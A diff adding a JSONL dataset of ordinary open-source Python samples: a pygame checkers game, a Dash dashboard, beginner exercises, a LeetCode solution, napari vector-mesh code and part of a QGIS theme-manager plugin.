diff --git "a/2994.jsonl" "b/2994.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2994.jsonl"
@@ -0,0 +1,435 @@
+{"seq_id":"25886481470","text":"#coding: utf-8\n__author__ = 'thiagowhispher'\n\nimport pygame as pg\n\nclass Board(pg.sprite.Sprite):\n def __init__(self, player_one, player_two):\n pg.sprite.Sprite.__init__(self)\n self.player_one = player_one\n self.player_two = player_two\n\n #Move Hero\n self.playing = False\n self.hero_select = None\n self.coord_hero_select = False\n self.new_coord_hero = False\n\n #Define heros of the two players\n self.heros = pg.sprite.Group()\n self.heros_move = pg.sprite.Group()\n self.heros_capture_required = pg.sprite.Group()\n\n def check_final_game(self):\n enemy = self.player_two.get_heros()\n final_player_one = self.player_one.without_play(self.heros, enemy, 1)\n enemy = self.player_one.get_heros()\n final_player_two = self.player_two.without_play(self.heros, enemy, 2)\n if final_player_one:\n return 2\n if final_player_two:\n return 1\n return 0\n\n def update_all_heros(self):\n self.heros.empty()\n self.heros.add(self.player_one.get_heros())\n self.heros.add(self.player_two.get_heros())\n\n def update_hero(self, pos):\n for hero in self.heros_move:\n if hero.equal_coord(pos):\n self.hero_select.set_coord(pos)\n return True\n return False\n\n def check_capture_required(self, turn):\n if turn == 1:\n enemy = self.player_two.get_heros()\n if self.hero_select == None or self.player_one.get_playing() == 'No play':\n self.heros_capture_required = self.player_one.check_capture_heros(enemy, self.heros)\n else:\n self.heros_capture_required.empty()\n if len(self.hero_select.capture(enemy, self.heros)):\n self.heros_capture_required.add(self.hero_select)\n else:\n enemy = self.player_one.get_heros()\n if self.hero_select == None or self.player_two.get_playing() == 'No play':\n self.heros_capture_required = self.player_two.check_capture_heros(enemy, self.heros)\n else:\n self.heros_capture_required.empty()\n if len(self.hero_select.capture(enemy, self.heros)):\n self.heros_capture_required.add(self.hero_select)\n\n def check_hero(self, hero_select):\n if not len(self.heros_capture_required):\n return True\n else:\n x, y = hero_select.get_coord()\n for hero in self.heros_capture_required:\n if hero.equal_coord([x, y]):\n return True\n return False\n\n def check_flip_turn(self, turn):\n if turn == 1:\n if self.player_one.get_playing() == 'No capture':\n self.player_one.set_playing('No play')\n self.hero_select = None\n turn = self.flip_turn(turn)\n elif self.player_one.get_playing() == 'Capture':\n if not self.player_one.hero_moving():\n self.check_capture_required(turn)\n if not len(self.heros_capture_required):\n self.player_one.set_playing('No play')\n self.hero_select = None\n turn = self.flip_turn(turn)\n else:\n if self.player_two.get_playing() == 'No capture':\n self.player_two.set_playing('No play')\n self.hero_select = None\n turn = self.flip_turn(turn)\n elif self.player_two.get_playing() == 'Capture':\n if not self.player_two.hero_moving():\n self.check_capture_required(turn)\n if not len(self.heros_capture_required):\n self.player_two.set_playing('No play')\n self.hero_select = None\n turn = self.flip_turn(turn)\n return turn\n\n def play(self, pos, turn):\n # Case: a hero is already selected\n if self.playing:\n if self.update_hero(pos):\n self.new_coord_hero = self.hero_select.get_coord()\n self.playing = False\n self.heros_move.empty()\n if turn == 1:\n if len(self.heros_capture_required):\n self.player_one.set_playing('Capture')\n 
self.hero_select.set_moving(True)\n else:\n self.player_one.set_playing('No capture')\n self.hero_select.set_moving(True)\n else:\n if len(self.heros_capture_required):\n self.player_two.set_playing('Capture')\n self.hero_select.set_moving(True)\n else:\n self.player_two.set_playing('No capture')\n self.hero_select.set_moving(True)\n self.heros_capture_required.empty()\n return self.heros_move\n\n if turn == 1:\n hero = self.player_one.search_hero(pos)\n enemy = self.player_two.get_heros()\n else:\n hero = self.player_two.search_hero(pos)\n enemy = self.player_one.get_heros()\n if hero[0]:\n if self.check_hero(hero[1]):\n self.hero_select = hero[1]\n self.playing = True\n self.coord_hero_select = self.hero_select.get_coord()\n self.heros_move = self.hero_select.move(self.heros, enemy, turn)\n else:\n self.playing = False\n self.heros_move.empty()\n else:\n self.playing = False\n self.hero_select = None\n self.heros_move.empty()\n return self.heros_move\n\n def analisy_capture(self, turn, heros_player_one, heros_player_two):\n if turn == 1:\n pg.sprite.groupcollide(heros_player_two, heros_player_one, True, False)\n else:\n pg.sprite.groupcollide(heros_player_one, heros_player_two, True, False)\n\n def flip_turn(self, turn):\n if turn == 1: return 2\n else: return 1\n\n def get_color_hero(self, player):\n if player == 1:\n return self.player_one.get_color_hero()\n else:\n return self.player_two.get_color_hero()\n\n def get_playing(self):\n return self.playing\n\n def get_heros(self):\n return self.heros\n","repo_name":"thiagoyeds/Kenney-Checkers","sub_path":"data/components/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"39"} +{"seq_id":"43467339615","text":"import os\nimport numpy as np\nimport plotly.express as px\nimport dash_bootstrap_components as dbc\nfrom utils import get_history_data\nfrom datetime import datetime, timedelta\nfrom dash import Dash, dcc, html, Input, Output, ctx, dash_table\n\nPAGE_SIZE = 5\ndash_title = \"SPC UI\"\ndf = get_history_data(100,10)\ndebug = False if os.environ[\"DASH_DEBUG_MODE\"] == \"False\" else True\nexternal_stylesheets = [dbc.themes.BOOTSTRAP]\noperators = [['ge ', '>='],\n ['le ', '<='],\n ['lt ', '<'],\n ['gt ', '>'],\n ['ne ', '!='],\n ['eq ', '='],\n ['contains '],\n ['datestartswith ']]\n\napp = Dash(\n __name__, \n title = dash_title, \n suppress_callback_exceptions = True, \n external_stylesheets = external_stylesheets\n )\n\napp.layout = html.Div([\n dbc.Card(\n dbc.CardBody([\n dbc.Row([\n dbc.Col([\n html.H4([\"Date Range\"]), \n dcc.DatePickerRange(\n id='date-picker-range',\n min_date_allowed=df[\"Inserted\"].min().strftime('%Y-%m-%d'), \n max_date_allowed=df[\"Inserted\"].max().strftime('%Y-%m-%d'),\n initial_visible_month=df[\"Inserted\"].min().strftime('%Y-%m-%d'),\n start_date=df[\"Inserted\"].min().strftime('%Y-%m-%d'),\n end_date=df[\"Inserted\"].max().strftime('%Y-%m-%d')\n ), \n ], width=3),\n dbc.Col([\n html.H4([\"Table\"]),\n dcc.Dropdown(id='dropdown-table',\n options=df['Table'].sort_values().unique().tolist(),\n multi=False,\n value=df['Table'].sort_values().unique().tolist()[0],\n placeholder='Select Table...',\n ),\n ], width=3),\n dbc.Col([\n html.Br(),\n dbc.Button('Filter In', id='btn-filter-in', n_clicks=0),\n ], width=1),\n dbc.Col([\n html.Br(),\n dbc.Button('Filter Out', id='btn-filter-out', n_clicks=0),\n ], width=1), \n ], align='center'), \n html.Br(),\n dbc.Row([\n dbc.Col([\n 
html.H4([\"History Point\"]), \n dcc.Graph(id = \"fig-history\", config={\"displayModeBar\": False})\n ]),\n ], align='center'), \n html.Br(),\n dbc.Row([\n dbc.Col([\n html.H4([\"Selected Point\"]), \n dash_table.DataTable(\n id='table-selected',\n columns=[\n {\"name\": i, \"id\": i} for i in df.columns\n ],\n page_current=0,\n page_size=PAGE_SIZE,\n page_action='custom',\n filter_action='custom',\n filter_query='',\n sort_action='custom',\n sort_mode='multi',\n sort_by=[]\n )\n ]),\n ], align='center'), \n ])\n )\n])\n\ndef calculate_threshold(cdf):\n mean = cdf[cdf['Status']=='used']['Metric'].mean()\n std = cdf[cdf['Status']=='used']['Metric'].std()\n upper_limit = mean + 3 * std\n lower_limit = mean - 3 * std \n return round(upper_limit, 2), round(lower_limit, 2)\n\ndef get_figure(dff, start_date, end_date, table, selectedpoints, selectedpoints_local, x_col=\"Inserted\", y_col=\"Metric\", t_col=\"PID\"):\n df = dff.copy()\n if selectedpoints_local and selectedpoints_local[\"range\"]:\n ranges = selectedpoints_local[\"range\"]\n selection_bounds = {\n \"x0\": ranges[\"x\"][0],\n \"x1\": ranges[\"x\"][1],\n \"y0\": ranges[\"y\"][0],\n \"y1\": ranges[\"y\"][1],\n }\n else:\n selection_bounds = {\n \"x0\": np.min(df[x_col]),\n \"x1\": np.max(df[x_col]),\n \"y0\": np.min(df[y_col]),\n \"y1\": np.max(df[y_col]),\n }\n df = df[(df['Table']==table)\n &(df['Inserted']>=datetime.strptime(start_date, '%Y-%m-%d'))\n &(df['Inserted'] 0:\n break\n Bintial += 200\n return Bintial\n","repo_name":"zhanqiyan/FiniteBlockLength","sub_path":"OptimizeParam.py","file_name":"OptimizeParam.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30531810343","text":"numero = int(input('Informe um número: '))\ncount = 0\n\nfor i in range(2, numero):\n if numero%i == 0:\n count += 1\n \nif count == 0:\n print('Primo!')\nelse:\n print('Não é primo!')","repo_name":"ifpb-cz-ads/pw1-2021-2-ac-s6-team_klinsman_joseane","sub_path":"questao_16.py","file_name":"questao_16.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13908532854","text":"deck_list = input().split(\" \")\r\ncount = int(input())\r\nsublist1 = []\r\nsublist2 = []\r\ntemporary_list = []\r\n\r\nfor i in range(count):\r\n for i in range(int(len(deck_list)/2)):\r\n sublist1.append(deck_list[i])\r\n for i in range(int(len(deck_list)/2), len(deck_list)):\r\n sublist2.append(deck_list[i])\r\n for i in range(len(sublist1)):\r\n temporary_list.append(sublist1[i])\r\n temporary_list.append(sublist2[i])\r\n deck_list = temporary_list.copy()\r\n temporary_list=[]\r\n sublist1 = []\r\n sublist2 = []\r\n\r\nprint(deck_list)\r\n","repo_name":"IvelinnaPancheva/SoftUni-Courses","sub_path":"programming_fundamentals/03-Lists-Basics-Exercise/faro_shuffle.py","file_name":"faro_shuffle.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37883217039","text":"# -*- coding: utf-8 -*-\n# author: caoji\n# datetime: 2023-02-08 22:57 \n# ide: PyCharm\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def sumNumbers(self, root: TreeNode) -> int:\n self.ans = 0\n\n def 
dfs(node, pre):\n if not node.left and not node.right:\n self.ans += pre * 10 + node.val\n return\n if node.left:\n dfs(node.left, pre * 10 + node.val)\n if node.right:\n dfs(node.right, pre * 10 + node.val)\n dfs(root, 0)\n return self.ans\n# leetcode submit region end(Prohibit modification and deletion)\n\n","repo_name":"aa694849243/leetcode_cj","sub_path":"剑指 Offer II 049. 从根节点到叶节点的路径数字之和.py","file_name":"剑指 Offer II 049. 从根节点到叶节点的路径数字之和.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37486191868","text":"import numpy as np\n\nfrom napari._vispy.layers.base import VispyBaseLayer\nfrom napari._vispy.visuals.vectors import VectorsVisual\nfrom napari.layers.utils.layer_utils import segment_normal\n\n\nclass VispyVectorsLayer(VispyBaseLayer):\n def __init__(self, layer) -> None:\n node = VectorsVisual()\n super().__init__(layer, node)\n\n self.layer.events.edge_color.connect(self._on_data_change)\n\n self.reset()\n self._on_data_change()\n\n def _on_data_change(self):\n # Make meshes\n vertices, faces = generate_vector_meshes(\n self.layer._view_data,\n self.layer.edge_width,\n self.layer.length,\n self.layer.vector_style,\n )\n face_color = self.layer._view_face_color\n ndisplay = self.layer._slice_input.ndisplay\n ndim = self.layer.ndim\n\n if len(vertices) == 0 or len(faces) == 0:\n vertices = np.zeros((3, ndisplay))\n faces = np.array([[0, 1, 2]])\n face_color = np.array([[0, 0, 0, 0]])\n else:\n vertices = vertices[:, ::-1]\n\n if ndisplay == 3 and ndim == 2:\n vertices = np.pad(vertices, ((0, 0), (0, 1)), mode='constant')\n\n self.node.set_data(\n vertices=vertices,\n faces=faces,\n face_colors=face_color,\n )\n\n self.node.update()\n # Call to update order of translation values with new dims:\n self._on_matrix_change()\n\n\ndef generate_vector_meshes(vectors, width, length, vector_style):\n \"\"\"Generates list of mesh vertices and triangles from a list of vectors\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n vector_style : VectorStyle\n display style of the vectors\n\n Returns\n -------\n vertices : (aN, 2) array for 2D and (2aN, 2) array for 3D, with a=4, 3, or 7 for vector_style='line', 'triangle', or 'arrow' respectively\n Vertices of all triangles\n triangles : (bN, 3) array for 2D or (2bN, 3) array for 3D, with b=2, 1, or 3 for vector_style='line', 'triangle', or 'arrow' respectively\n Vertex indices that form the mesh triangles\n \"\"\"\n ndim = vectors.shape[2]\n if ndim == 2:\n vertices, triangles = generate_vector_meshes_2D(\n vectors, width, length, vector_style\n )\n else:\n v_a, t_a = generate_vector_meshes_2D(\n vectors, width, length, vector_style, p=(0, 0, 1)\n )\n v_b, t_b = generate_vector_meshes_2D(\n vectors, width, length, vector_style, p=(1, 0, 0)\n )\n vertices = np.concatenate([v_a, v_b], axis=0)\n triangles = np.concatenate([t_a, len(v_a) + t_b], axis=0)\n\n return vertices, triangles\n\n\ndef generate_vector_meshes_2D(\n vectors, width, length, vector_style, p=(0, 0, 1)\n):\n \"\"\"Generates list of mesh vertices and triangles from a list of vectors\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n 
width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n vector_style : VectorStyle\n display style of the vectors\n p : 3-tuple, optional\n orthogonal vector for segment calculation in 3D.\n\n Returns\n -------\n vertices : (aN, 2) array for 2D, with a=4, 3, or 7 for vector_style='line', 'triangle', or 'arrow' respectively\n Vertices of all triangles\n triangles : (bN, 3) array for 2D, with b=2, 1, or 3 for vector_style='line', 'triangle', or 'arrow' respectively\n Vertex indices that form the mesh triangles\n \"\"\"\n\n if vector_style == 'line':\n vertices, triangles = generate_meshes_line_2D(\n vectors, width, length, p\n )\n\n elif vector_style == 'triangle':\n vertices, triangles = generate_meshes_triangle_2D(\n vectors, width, length, p\n )\n\n elif vector_style == 'arrow':\n vertices, triangles = generate_meshes_arrow_2D(\n vectors, width, length, p\n )\n\n return vertices, triangles\n\n\ndef generate_meshes_line_2D(vectors, width, length, p):\n \"\"\"Generates list of mesh vertices and triangles from a list of vectors.\n\n Vectors are composed of 4 vertices and 2 triangles.\n Vertices are generated according to the following scheme::\n\n 1---x---0\n | . |\n | . |\n | . |\n 3---v---2\n\n Where x marks the start point of the vector, and v its end point.\n\n In the case of k 2D vectors, the output 'triangles' is:\n [\n [0,1,2], # vector 0, triangle i=0\n [1,2,3], # vector 0, triangle i=1\n [4,5,6], # vector 1, triangle i=2\n [5,6,7], # vector 1, triangle i=3\n\n ...,\n\n [2i, 2i + 1, 2i + 2], # vector k-1, triangle i=2k-2 (i%2=0)\n [2i - 1, 2i, 2i + 1] # vector k-1, triangle i=2k-1 (i%2=1)\n ]\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n p : 3-tuple\n orthogonal vector for segment calculation in 3D.\n\n Returns\n -------\n vertices : (4N, D) array\n Vertices of all triangles\n triangles : (2N, 3) array\n Vertex indices that form the mesh triangles\n \"\"\"\n nvectors, _, ndim = vectors.shape\n\n vectors_starts = vectors[:, 0]\n vectors_ends = vectors_starts + length * vectors[:, 1]\n\n vertices = np.zeros((4 * nvectors, ndim))\n offsets = segment_normal(vectors_starts, vectors_ends, p=p)\n offsets = np.repeat(offsets, 4, axis=0)\n\n signs = np.ones((len(offsets), ndim))\n signs[::2] = -1\n offsets = offsets * signs\n\n vertices[::4] = vectors_starts\n vertices[1::4] = vectors_starts\n vertices[2::4] = vectors_ends\n vertices[3::4] = vectors_ends\n\n vertices = vertices + width * offsets / 2\n\n # Generate triangles in two steps:\n # 1. Repeat the vertices pattern\n # [[0,1,2],\n # [1,2,3]]\n # as described in the docstring\n vertices_pattern = np.tile([[0, 1, 2], [1, 2, 3]], (nvectors, 1))\n # 2. Add an offset to differentiate between vectors\n triangles = (\n vertices_pattern + np.repeat(4 * np.arange(nvectors), 2)[:, np.newaxis]\n )\n\n triangles = triangles.astype(np.uint32)\n\n return vertices, triangles\n\n\ndef generate_meshes_triangle_2D(vectors, width, length, p):\n \"\"\"Generate meshes forming 2D isosceles triangles to represent input vectors.\n\n Vectors are composed of 3 vertices and 1 triangles.\n Vertices are generated according to the following scheme::\n\n 1---x---0\n . .\n . .\n . 
.\n 2\n\n\n Where x marks the start point of the vector, and the vertex 2 its end\n point.\n\n In the case of k 2D vectors, the output 'triangles' is:\n [\n [0,1,2], # vector 0, triangle i=0\n [3,4,5], # vector 1, triangle i=1\n\n ...,\n\n [3i, 3i + 1, 3i + 2] # vector k-1, triangle i=k-1\n ]\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n p : 3-tuple\n orthogonal vector for segment calculation in 3D.\n\n Returns\n -------\n vertices : (3N, D) array\n Vertices of all triangles\n triangles : (N, 3) array\n Vertex indices that form the mesh triangles\n \"\"\"\n nvectors, _, ndim = vectors.shape\n\n vectors_starts = vectors[:, 0]\n vectors_ends = vectors_starts + length * vectors[:, 1]\n\n vertices = np.zeros((3 * nvectors, ndim))\n offsets = segment_normal(vectors_starts, vectors_ends, p=p)\n offsets = np.repeat(offsets, 3, axis=0)\n\n signs = np.ones((len(offsets), ndim))\n signs[::3] = -1\n multipliers = np.ones((len(offsets), ndim))\n multipliers[2::3] = 0\n\n # here 'multipliers' is used to prevent vertex 2 from being offset\n offsets = offsets * signs * multipliers\n\n vertices[::3] = vectors_starts\n vertices[1::3] = vectors_starts\n vertices[2::3] = vectors_ends\n\n vertices = vertices + width * offsets / 2\n\n # faster than using the formula in the docstring\n triangles = np.arange(3 * nvectors, dtype=np.uint32).reshape((-1, 3))\n\n return vertices, triangles\n\n\ndef generate_meshes_arrow_2D(vectors, width, length, p):\n \"\"\"Generate mesh forming 2D arrows given input vectors.\n\n Vectors are composed of 7 vertices and 3 triangles.\n Vertices are generated according to the following scheme::\n\n 1---x---0\n | . |\n | . |\n | . |\n 5---3-------2---4\n . .\n . 
.\n 6\n\n Where x marks the start point of the vector, and the vertex 6 its end\n point.\n\n In the case of k 2D vectors, the output 'triangles' is:\n [\n [0,1,2], # vector 0, triangle i=0\n [1,2,3], # vector 0, triangle i=1\n [4,5,6], # vector 0, triangle i=2\n [7,8,9], # vector 1, triangle i=3\n [8,9,10], # vector 1, triangle i=4\n [11,12,13], # vector 1, triangle i=5\n\n ...,\n\n [7i/3, 7i/3 + 1, 7i/3 + 2],\n # vector k-1, triangle i=3k-3 (i%3=0)\n [7(i - 1)/3 + 1, 7(i - 1)/3 + 2, 7(i - 1)/3 + 3],\n # vector k-1, triangle i=3k-2 (i%3=1)\n [7(i - 2)/3 + 4, 7(i - 2)/3 + 5, 7(i - 2)/3 + 6]\n # vector k-1, triangle i=3k-1 (i%3=2)\n ]\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n p : 3-tuple\n orthogonal vector for segment calculation in 3D.\n\n Returns\n -------\n vertices : (7N, D) array\n Vertices of all triangles\n triangles : (3N, 3) array\n Vertex indices that form the mesh triangles\n \"\"\"\n nvectors, _, ndim = vectors.shape\n\n vectors_starts = vectors[:, 0]\n\n # Will be used to generate the vertices 2,3,4 and 5.\n # Right now the head of the arrow is put at 75% of the length\n # of the vector.\n vectors_intermediates = vectors_starts + 0.75 * length * vectors[:, 1]\n\n vectors_ends = vectors_starts + length * vectors[:, 1]\n\n vertices = np.zeros((7 * nvectors, ndim))\n offsets = segment_normal(vectors_starts, vectors_ends, p=p)\n offsets = np.repeat(offsets, 7, axis=0)\n\n signs = np.ones((len(offsets), ndim))\n signs[::2] = -1\n multipliers = np.ones((len(offsets), ndim))\n multipliers[4::7] = 2\n multipliers[5::7] = 2\n multipliers[6::7] = 0\n\n # here 'multipliers' is used to prevent vertex 6 from being offset,\n # and to offset vertices 4 and 5 twice as much as vertices 2 and 3\n offsets = offsets * signs * multipliers\n\n vertices[::7] = vectors_starts\n vertices[1::7] = vectors_starts\n vertices[2::7] = vectors_intermediates\n vertices[3::7] = vectors_intermediates\n vertices[4::7] = vectors_intermediates\n vertices[5::7] = vectors_intermediates\n vertices[6::7] = vectors_ends\n\n vertices = vertices + width * offsets / 2\n\n # Generate triangles in two steps:\n # 1. Repeat the vertices pattern\n # [[0,1,2],\n # [1,2,3]\n # [4,5,6]]\n # as described in the docstring\n vertices_pattern = np.tile(\n [[0, 1, 2], [1, 2, 3], [4, 5, 6]], (nvectors, 1)\n )\n # 2. 
Add an offset to differentiate between vectors\n triangles = (\n vertices_pattern + np.repeat(7 * np.arange(nvectors), 3)[:, np.newaxis]\n )\n\n triangles = triangles.astype(np.uint32)\n\n return vertices, triangles\n","repo_name":"napari/napari","sub_path":"napari/_vispy/layers/vectors.py","file_name":"vectors.py","file_ext":"py","file_size_in_byte":12444,"program_lang":"python","lang":"en","doc_type":"code","stars":1800,"dataset":"github-code","pt":"39"} +{"seq_id":"74034468915","text":"import os\nimport json\nimport subprocess\nimport webbrowser\nimport requests\nfrom qgis.PyQt import uic\nfrom qgis.PyQt.QtWidgets import *\nfrom qgis.PyQt.QtCore import *\nfrom qgis.PyQt.QtGui import *\n\nfrom qgis.core import *\n\nfrom .theme_settings_dialog import ThemeSettingsDialog\n\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'ui/themes_manager.ui'))\n\n\nclass ThemeManagerDockWidget(QDockWidget, FORM_CLASS):\n\n def __init__(self, iface, parent=None):\n super(ThemeManagerDockWidget, self).__init__(parent)\n\n self.setupUi(self)\n self.settings = QSettings()\n self.iface = iface\n\n self.buttonBox.button(QDialogButtonBox.Retry).setText(\"Refresh\")\n\n QgsProject.instance().readProject.connect(self.enable_publish_button)\n self.themes_listWidget.itemClicked.connect(self.enable_buttons)\n self.qwc2Dir_button.clicked.connect(\n lambda: self.open_file_browser(self.qwc2Dir_lineEdit))\n self.qwc2Dir_lineEdit.textChanged.connect(\n lambda: self.check_path(self.qwc2Dir_lineEdit,\n self.error_lbl_qwc2))\n self.projectsDir_button.clicked.connect(\n lambda: self.open_file_browser(self.projectsDir_lineEdit))\n self.projectsDir_lineEdit.textChanged.connect(\n lambda: self.check_path(self.projectsDir_lineEdit,\n self.error_lbl_server))\n self.qwc2Url_lineEdit.editingFinished.connect(self.enable_qwc2_button)\n self.qwc2Url_lineEdit.textChanged.connect(\n lambda: self.check_path(self.qwc2Url_lineEdit,\n self.error_lbl_url, url=True))\n self.buttonBox.button(QDialogButtonBox.Save).clicked.connect(\n self.save_themes_config)\n self.buttonBox.button(QDialogButtonBox.Save).clicked.connect(\n self.save_paths)\n self.buttonBox.button(QDialogButtonBox.Retry).clicked.connect(\n self.load_themes_config)\n self.defaultScales_lineEdit.textChanged.connect(\n lambda: self.check_numbers(self.defaultScales_lineEdit))\n self.defaultPrintScales_lineEdit.textChanged.connect(\n lambda: self.check_numbers(self.defaultPrintScales_lineEdit))\n self.defaultPrintResolutions_lineEdit.textChanged.connect(\n lambda: self.check_numbers(self.defaultPrintResolutions_lineEdit))\n self.addTheme_button.clicked.connect(\n lambda: self.create_or_edit_theme(\"create\"))\n self.editTheme_button.clicked.connect(\n lambda: self.create_or_edit_theme(\"edit\"))\n self.deleteTheme_button.clicked.connect(self.delete_theme)\n self.openProject_button.clicked.connect(self.open_project)\n self.showQWC2_button.clicked.connect(self.open_qwc2)\n\n self.error_lbl_qwc2.setVisible(False)\n self.error_lbl_server.setVisible(False)\n self.error_lbl_url.setVisible(False)\n\n self.set_qwc2_dir_path(self.settings.value(\n \"qwc2-themes-manager/qwc2_directory\"))\n self.set_projects_dir_path(self.settings.value(\n \"qwc2-themes-manager/project_directory\"))\n self.set_qwc2_url(self.settings.value(\"qwc2-themes-manager/qwc2_url\"))\n self.tabWidget.currentChanged.connect(self.save_paths)\n\n self.qwc2Dir_button.setIcon(QIcon(\n \":/images/themes/default/mActionFileOpen.svg\"))\n self.projectsDir_button.setIcon(QIcon(\n 
\":/images/themes/default/mActionFileOpen.svg\"))\n\n self.activate_themes_tab()\n\n def set_qwc2_dir_path(self, path):\n self.qwc2Dir_lineEdit.setText(path)\n\n def set_projects_dir_path(self, path):\n self.projectsDir_lineEdit.setText(path)\n\n def set_qwc2_url(self, url):\n self.qwc2Url_lineEdit.setText(url)\n\n def open_file_browser(self, lineEdit):\n path = QFileDialog.getExistingDirectory(\n self, \"Select a directory\",\n options=QFileDialog.ShowDirsOnly)\n if path:\n lineEdit.setText(path)\n\n def check_path(self, lineEdit, label, url=False):\n if url is True:\n url = lineEdit.text()\n if not url.startswith(\"http\"):\n url = \"http://\" + url\n try:\n requests.get(url)\n label.setVisible(False)\n lineEdit.setStyleSheet(\"background: #FFFFFF; color: #000000;\")\n except:\n label.setVisible(True)\n label.setText(\"This url does not exist\")\n lineEdit.setStyleSheet(\"background: #FF7777; color: #FFFFFF;\")\n else:\n perm_ok, msg = self.check_permissions(lineEdit.text().strip())\n if perm_ok:\n label.setVisible(False)\n lineEdit.setStyleSheet(\"background: #FFFFFF; color: #000000;\")\n else:\n label.setVisible(True)\n label.setText(msg)\n lineEdit.setStyleSheet(\"background: #FF7777; color: #FFFFFF;\")\n\n self.activate_themes_tab()\n\n def save_paths(self):\n self.settings.setValue(\"qwc2-themes-manager/qwc2_directory\",\n self.qwc2Dir_lineEdit.text())\n self.settings.setValue(\"qwc2-themes-manager/project_directory\",\n self.projectsDir_lineEdit.text())\n self.settings.setValue(\"qwc2-themes-manager/qwc2_url\",\n self.qwc2Url_lineEdit.text())\n self.load_themes_config()\n\n def activate_themes_tab(self):\n style = \"background: #FFFFFF; color: #000000;\"\n if self.qwc2Dir_lineEdit.styleSheet() == style and \\\n self.projectsDir_lineEdit.styleSheet() == style \\\n and self.qwc2Url_lineEdit.styleSheet() == style:\n self.tabWidget.setTabEnabled(0, True)\n else:\n self.tabWidget.setTabEnabled(0, False)\n\n def deactivate_themes_tab(self):\n for child in self.themes_tab.children():\n if isinstance(child, QGridLayout):\n continue\n child.setEnabled(False)\n self.defaultScales_lineEdit.setText(\"\")\n self.buttonBox.setEnabled(True)\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(False)\n\n def load_themes_config(self):\n themes_dict = self.check_config()\n if themes_dict is None:\n return\n for child in self.themes_tab.children():\n child.setEnabled(True)\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(True)\n self.reset_ui()\n\n if \"defaultScales\" in themes_dict:\n self.defaultScales_lineEdit.setText(\n \",\".join(str(num) for num in themes_dict[\"defaultScales\"]))\n\n if \"defaultPrintScales\" in themes_dict:\n self.defaultPrintScales_lineEdit.setText(\n \",\".join(\n str(num) for num in themes_dict[\"defaultPrintScales\"]))\n\n if \"defaultPrintResolutions\" in themes_dict:\n self.defaultPrintResolutions_lineEdit.setText(\n \",\".join(str(num) for num in themes_dict[\n \"defaultPrintResolutions\"]))\n\n if \"themes\" in themes_dict.keys() and \"items\" in themes_dict[\n \"themes\"].keys():\n self.fill_listView(themes_dict[\"themes\"][\"items\"])\n for theme in themes_dict[\"themes\"][\"items\"]:\n if \"default\" in theme.keys():\n if \"title\" in theme.keys():\n self.defaultTheme_comboBox.setCurrentText(\n theme[\"title\"])\n break\n elif \"url\" in theme.keys():\n title = os.path.basename(theme[\"url\"])\n self.defaultTheme_comboBox.setCurrentText(title)\n break\n\n def check_config(self):\n path = os.path.join(self.qwc2Dir_lineEdit.text(), 
\"themesConfig.json\")\n themes_config = self.read_themes_config(path)\n themes_dict = None\n if not themes_config:\n return\n\n try:\n themes_dict = json.load(themes_config)\n except Exception:\n QgsMessageLog.logMessage(\n \"Corrupt JSON file: The JSON module couldn't read the \"\n \"themesConfig.json file.\",\n \"QWC2 Theme Manager\", Qgis.Critical)\n res = QMessageBox.question(\n None, \"QWC2 Theme Manager\",\n \"It seems that your themesConfig.json file is corrupt.\\n\"\n \"Would you like to create a new themesConfig.json file\"\n \" and override the existing one?\")\n if res == QMessageBox.No:\n self.deactivate_themes_tab()\n return\n else:\n themes_config = self.create_new_themes_config(path)\n if themes_config:\n themes_dict = json.load(themes_config)\n\n themes_config.close()\n return themes_dict\n\n def read_themes_config(self, path):\n try:\n themes_config = open(path, \"r\", encoding=\"utf-8\")\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot open themes configuration file\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot open file: %s.\" % path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n self.deactivate_themes_tab()\n return None\n except FileNotFoundError:\n return self.create_new_themes_config(path)\n\n return themes_config\n\n def create_new_themes_config(self, path):\n try:\n themes_dict = open(path, 'w')\n themes_dict.write(\"{}\")\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot create new themes configuration file.\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot override file: %s.\" % path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n return\n except FileNotFoundError:\n QgsMessageLog.logMessage(\n \"The Path: %s was not found.\" % path,\n 